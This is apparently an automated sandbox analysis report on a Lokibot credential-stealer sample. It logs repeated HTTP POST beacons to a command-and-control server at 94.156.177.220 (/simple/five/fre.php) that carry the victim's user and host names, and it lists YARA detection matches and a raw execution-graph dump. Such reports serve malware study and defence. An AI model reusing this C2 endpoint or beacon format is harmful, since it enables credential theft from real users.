                                  92192.168.2.45009494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:55.918642998 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:55.924734116 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:56.895411015 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:56 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  93192.168.2.45009594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:57.167407990 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:57.172837019 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:58.166055918 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  94192.168.2.45009694.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:58.333457947 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:58.339191914 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:59.355499983 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:59 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  95192.168.2.45009794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:59.521910906 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:59.527534962 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:22:00.528371096 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:22:00 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  96192.168.2.45009894.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:22:01.011735916 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:22:01.017570972 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:22:02.033549070 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:22:01 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  97192.168.2.45009994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:22:02.178251028 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:22:02.183819056 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:22:03.140045881 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:22:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  98192.168.2.45010094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:22:04.440668106 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:22:04.446101904 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:22:05.409997940 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:22:05 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  99192.168.2.45010194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:22:05.570533037 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:22:05.576112032 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:22:06.540014029 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:22:06 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  100192.168.2.45010294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:22:06.704200983 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:22:06.709690094 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:22:07.661010981 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:22:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Click to jump to process

                                  Click to jump to process

                                  Click to dive into process behavior distribution

                                  Target ID:0
                                  Start time:04:19:59
                                  Start date:25/10/2024
                                  Path:C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe"
                                  Imagebase:0x400000
                                  File size:106'496 bytes
                                  MD5 hash:3FB350F4356F42B51A523B6FA8CBCCF3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000000.1682431268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000000.1682466074.0000000000415000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000000.00000002.2948580807.000000000083E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:false

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:31.1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:4.4%
                                    Total number of Nodes:1846
                                    Total number of Limit Nodes:92
                                    execution_graph 9691 40c640 9718 404bee 9691->9718 9694 40c70f 9695 404bee 6 API calls 9696 40c66b 9695->9696 9697 40c708 9696->9697 9699 404bee 6 API calls 9696->9699 9698 402bab 2 API calls 9697->9698 9698->9694 9700 40c683 9699->9700 9702 404bee 6 API calls 9700->9702 9705 40c701 9700->9705 9701 402bab 2 API calls 9701->9697 9703 40c694 9702->9703 9712 40c6f8 9703->9712 9725 40c522 9703->9725 9704 402bab 2 API calls 9704->9705 9705->9701 9707 40c6a9 9708 40c6ef 9707->9708 9709 405872 4 API calls 9707->9709 9710 402bab 2 API calls 9708->9710 9711 40c6c5 9709->9711 9710->9712 9713 405872 4 API calls 9711->9713 9712->9704 9714 40c6d5 9713->9714 9715 405872 4 API calls 9714->9715 9716 40c6e7 9715->9716 9717 402bab 2 API calls 9716->9717 9717->9708 9719 402b7c 2 API calls 9718->9719 9721 404bff 9719->9721 9720 404c3b 9720->9694 9720->9695 9721->9720 9722 4031e5 4 API calls 9721->9722 9723 404c28 9722->9723 9723->9720 9724 402bab 2 API calls 9723->9724 9724->9720 9726 402b7c 2 API calls 9725->9726 9727 40c542 9726->9727 9727->9707 9728 405941 9729 4031e5 4 API calls 9728->9729 9730 405954 9729->9730 8295 409046 8308 413b28 8295->8308 8297 40906d 8299 405b6f 6 API calls 8297->8299 8298 40904e 8298->8297 8300 403fbf 7 API calls 8298->8300 8301 40907c 8299->8301 8300->8297 8302 409092 8301->8302 8312 409408 8301->8312 8304 4090a3 8302->8304 8307 402bab 2 API calls 8302->8307 8306 402bab 2 API calls 8306->8302 8307->8304 8309 413b31 8308->8309 8310 413b38 8308->8310 8311 404056 6 API calls 8309->8311 8310->8298 8311->8310 8313 409413 8312->8313 8314 40908c 8313->8314 8326 409d36 8313->8326 8314->8306 8325 40945c 8432 40a35d 8325->8432 8327 409d43 8326->8327 8328 40a35d 4 API calls 8327->8328 8329 409d55 8328->8329 8330 4031e5 4 API calls 8329->8330 8331 409d8b 8330->8331 8332 4031e5 4 API calls 8331->8332 8333 409dd0 8332->8333 8334 405b6f 6 API calls 8333->8334 8365 409423 8333->8365 8336 409df7 8334->8336 8335 409e1c 8337 4031e5 4 API calls 8335->8337 8335->8365 8336->8335 8339 402bab 2 API calls 8336->8339 8338 409e62 8337->8338 8340 4031e5 4 API calls 8338->8340 8339->8335 8341 409e82 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409ea2 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409ec2 8344->8345 8346 4031e5 4 API calls 8345->8346 8347 409ee2 8346->8347 8348 4031e5 4 API calls 8347->8348 8349 409f02 8348->8349 8350 4031e5 4 API calls 8349->8350 8351 409f22 8350->8351 8352 4031e5 4 API calls 8351->8352 8355 409f42 8352->8355 8353 40a19b 8354 408b2c 4 API calls 8353->8354 8354->8365 8355->8353 8356 409fa3 8355->8356 8357 405b6f 6 API calls 8356->8357 8356->8365 8359 409fbd 8357->8359 8358 40a02c 8360 4031e5 4 API calls 8358->8360 8386 40a16d 8358->8386 8359->8358 8361 402bab 2 API calls 8359->8361 8362 40a070 8360->8362 8364 409fd7 8361->8364 8367 4031e5 4 API calls 8362->8367 8363 402bab 2 API calls 8363->8365 8366 405b6f 6 API calls 8364->8366 8365->8325 8388 4056bf 8365->8388 8369 409fe5 8366->8369 8368 40a090 8367->8368 8371 4031e5 4 API calls 8368->8371 8369->8358 8370 402bab 2 API calls 8369->8370 8372 409fff 8370->8372 8373 40a0b0 8371->8373 8374 405b6f 6 API calls 8372->8374 8376 4031e5 4 API calls 8373->8376 8375 40a00d 8374->8375 8375->8358 8378 40a021 8375->8378 8377 40a0d0 8376->8377 8379 4031e5 4 API calls 8377->8379 8380 402bab 2 API calls 8378->8380 8381 40a0f0 8379->8381 8380->8365 8382 4031e5 4 API calls 8381->8382 8383 40a110 8382->8383 8384 4031e5 4 API calls 8383->8384 8387 40a134 8383->8387 8384->8387 8386->8363 8386->8365 8387->8386 8442 408b2c 8387->8442 8389 402b7c 2 API calls 8388->8389 8391 4056cd 8389->8391 8390 4056d4 8393 408c4d 8390->8393 8391->8390 8392 402b7c 2 API calls 8391->8392 8392->8390 8394 413ba4 6 API calls 8393->8394 8395 408c5c 8394->8395 8396 408f02 8395->8396 8397 408f3a 8395->8397 8400 40903e 8395->8400 8399 405b6f 6 API calls 8396->8399 8398 405b6f 6 API calls 8397->8398 8414 408f51 8398->8414 8401 408f0c 8399->8401 8416 413aca 8400->8416 8401->8400 8405 408f31 8401->8405 8445 40a1b6 8401->8445 8403 405b6f 6 API calls 8403->8414 8404 402bab 2 API calls 8404->8400 8405->8404 8407 409031 8408 402bab 2 API calls 8407->8408 8408->8405 8409 409022 8410 402bab 2 API calls 8409->8410 8411 409028 8410->8411 8412 402bab 2 API calls 8411->8412 8412->8405 8413 402bab GetProcessHeap HeapFree 8413->8414 8414->8400 8414->8403 8414->8405 8414->8407 8414->8409 8414->8413 8415 40a1b6 14 API calls 8414->8415 8479 4044ee 8414->8479 8415->8414 8417 413ad7 8416->8417 8425 409451 8416->8425 8418 405781 4 API calls 8417->8418 8419 413af0 8418->8419 8420 405781 4 API calls 8419->8420 8421 413afe 8420->8421 8422 405762 4 API calls 8421->8422 8423 413b0e 8422->8423 8424 405781 4 API calls 8423->8424 8423->8425 8424->8425 8426 405695 8425->8426 8427 4056a0 8426->8427 8431 4056b9 8426->8431 8428 402bab 2 API calls 8427->8428 8429 4056b3 8428->8429 8430 402bab 2 API calls 8429->8430 8430->8431 8431->8325 8433 40a368 8432->8433 8434 40a39a 8432->8434 8437 4031e5 4 API calls 8433->8437 8435 40a3af 8434->8435 8436 4031e5 4 API calls 8434->8436 8438 408b2c 4 API calls 8435->8438 8440 40a3ca 8435->8440 8436->8435 8441 40a38a 8437->8441 8438->8440 8439 408b2c 4 API calls 8439->8441 8440->8439 8440->8441 8441->8314 8443 4031e5 4 API calls 8442->8443 8444 408b3e 8443->8444 8444->8386 8446 40a202 8445->8446 8447 40a1c3 8445->8447 8601 405f08 8446->8601 8449 405b6f 6 API calls 8447->8449 8451 40a1d0 8449->8451 8450 40a1fc 8450->8405 8451->8450 8454 40a1f3 8451->8454 8489 40a45b 8451->8489 8453 40a333 8455 402bab 2 API calls 8453->8455 8457 402bab 2 API calls 8454->8457 8455->8450 8457->8450 8458 405b6f 6 API calls 8460 40a245 8458->8460 8459 40a25d 8461 405b6f 6 API calls 8459->8461 8460->8459 8462 413a58 13 API calls 8460->8462 8467 40a26b 8461->8467 8464 40a257 8462->8464 8463 40a28b 8465 405b6f 6 API calls 8463->8465 8466 402bab 2 API calls 8464->8466 8471 40a297 8465->8471 8466->8459 8467->8463 8468 40a284 8467->8468 8608 40955b 8467->8608 8470 402bab 2 API calls 8468->8470 8470->8463 8473 40a2b0 8471->8473 8476 40a2b7 8471->8476 8615 40968e 8471->8615 8472 405b6f 6 API calls 8472->8476 8475 402bab 2 API calls 8473->8475 8475->8476 8476->8453 8476->8472 8478 402bab 2 API calls 8476->8478 8625 4098a7 8476->8625 8478->8476 8480 402b7c 2 API calls 8479->8480 8481 404512 8480->8481 8483 404585 GetLastError 8481->8483 8484 402bab 2 API calls 8481->8484 8487 402b7c 2 API calls 8481->8487 8488 40457c 8481->8488 8880 4044a7 8481->8880 8485 404592 8483->8485 8483->8488 8484->8481 8486 402bab 2 API calls 8485->8486 8486->8488 8487->8481 8488->8414 8634 40642c 8489->8634 8491 40a469 8492 40c4ff 8491->8492 8637 4047e6 8491->8637 8492->8454 8495 4040bb 12 API calls 8496 40bf88 8495->8496 8496->8492 8497 403c90 8 API calls 8496->8497 8498 40bfaa 8497->8498 8499 402b7c 2 API calls 8498->8499 8501 40bfc1 8499->8501 8500 40c4f3 8502 403f9e 5 API calls 8500->8502 8503 40c3aa 8501->8503 8644 40a423 8501->8644 8502->8492 8503->8500 8506 4056bf 2 API calls 8503->8506 8509 40c4e3 8503->8509 8504 402bab 2 API calls 8504->8500 8508 40c3d2 8506->8508 8508->8509 8511 4040bb 12 API calls 8508->8511 8509->8504 8510 405f08 4 API calls 8512 40c005 8510->8512 8513 40c3f3 8511->8513 8514 40c021 8512->8514 8647 40a43f 8512->8647 8516 40c4d1 8513->8516 8704 405a52 8513->8704 8515 4031e5 4 API calls 8514->8515 8518 40c034 8515->8518 8521 413aca 4 API calls 8516->8521 8527 4031e5 4 API calls 8518->8527 8522 40c4dd 8521->8522 8525 405695 2 API calls 8522->8525 8523 40c411 8709 405a87 8523->8709 8524 402bab 2 API calls 8524->8514 8525->8509 8533 40c04d 8527->8533 8528 40c4b3 8529 402bab 2 API calls 8528->8529 8531 40c4cb 8529->8531 8530 405a52 4 API calls 8541 40c423 8530->8541 8532 403f9e 5 API calls 8531->8532 8532->8516 8535 4031e5 4 API calls 8533->8535 8534 405a87 4 API calls 8534->8541 8536 40c085 8535->8536 8538 4031e5 4 API calls 8536->8538 8537 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8537->8541 8539 40c09c 8538->8539 8542 4031e5 4 API calls 8539->8542 8540 402bab 2 API calls 8540->8541 8541->8528 8541->8530 8541->8534 8541->8537 8541->8540 8543 40c0b3 8542->8543 8544 4031e5 4 API calls 8543->8544 8545 40c0ca 8544->8545 8546 4031e5 4 API calls 8545->8546 8547 40c0e7 8546->8547 8548 4031e5 4 API calls 8547->8548 8549 40c100 8548->8549 8550 4031e5 4 API calls 8549->8550 8551 40c119 8550->8551 8552 4031e5 4 API calls 8551->8552 8553 40c132 8552->8553 8554 4031e5 4 API calls 8553->8554 8555 40c14b 8554->8555 8556 4031e5 4 API calls 8555->8556 8557 40c164 8556->8557 8558 4031e5 4 API calls 8557->8558 8559 40c17d 8558->8559 8560 4031e5 4 API calls 8559->8560 8561 40c196 8560->8561 8562 4031e5 4 API calls 8561->8562 8563 40c1af 8562->8563 8564 4031e5 4 API calls 8563->8564 8565 40c1c8 8564->8565 8566 4031e5 4 API calls 8565->8566 8567 40c1de 8566->8567 8568 4031e5 4 API calls 8567->8568 8569 40c1f4 8568->8569 8570 4031e5 4 API calls 8569->8570 8571 40c20d 8570->8571 8572 4031e5 4 API calls 8571->8572 8573 40c226 8572->8573 8574 4031e5 4 API calls 8573->8574 8575 40c23f 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c258 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c273 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c28a 8580->8581 8582 4031e5 4 API calls 8581->8582 8585 40c2d5 8582->8585 8583 40c3a2 8584 402bab 2 API calls 8583->8584 8584->8503 8585->8583 8586 4031e5 4 API calls 8585->8586 8587 40c315 8586->8587 8588 40c38b 8587->8588 8650 404866 8587->8650 8589 403c40 5 API calls 8588->8589 8591 40c397 8589->8591 8593 403c40 5 API calls 8591->8593 8593->8583 8594 40c382 8596 403c40 5 API calls 8594->8596 8596->8588 8598 406c4c 6 API calls 8599 40c355 8598->8599 8599->8594 8674 4126a7 8599->8674 8602 4031e5 4 API calls 8601->8602 8603 405f1d 8602->8603 8604 402b7c 2 API calls 8603->8604 8605 405f55 8603->8605 8606 405f36 8604->8606 8605->8450 8605->8453 8605->8458 8605->8459 8606->8605 8607 4031e5 4 API calls 8606->8607 8607->8605 8609 409673 8608->8609 8614 40956d 8608->8614 8609->8468 8610 408b45 6 API calls 8610->8614 8611 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8611->8614 8612 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8612->8614 8613 402bab GetProcessHeap HeapFree 8613->8614 8614->8609 8614->8610 8614->8611 8614->8612 8614->8613 8616 4040bb 12 API calls 8615->8616 8624 4096a9 8616->8624 8617 40989f 8617->8473 8618 409896 8619 403f9e 5 API calls 8618->8619 8619->8617 8621 408b45 6 API calls 8621->8624 8622 402bab GetProcessHeap HeapFree 8622->8624 8623 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8623->8624 8624->8617 8624->8618 8624->8621 8624->8622 8624->8623 8873 4059d8 8624->8873 8626 4040bb 12 API calls 8625->8626 8633 4098c1 8626->8633 8627 4099fb 8627->8476 8628 4099f3 8629 403f9e 5 API calls 8628->8629 8629->8627 8630 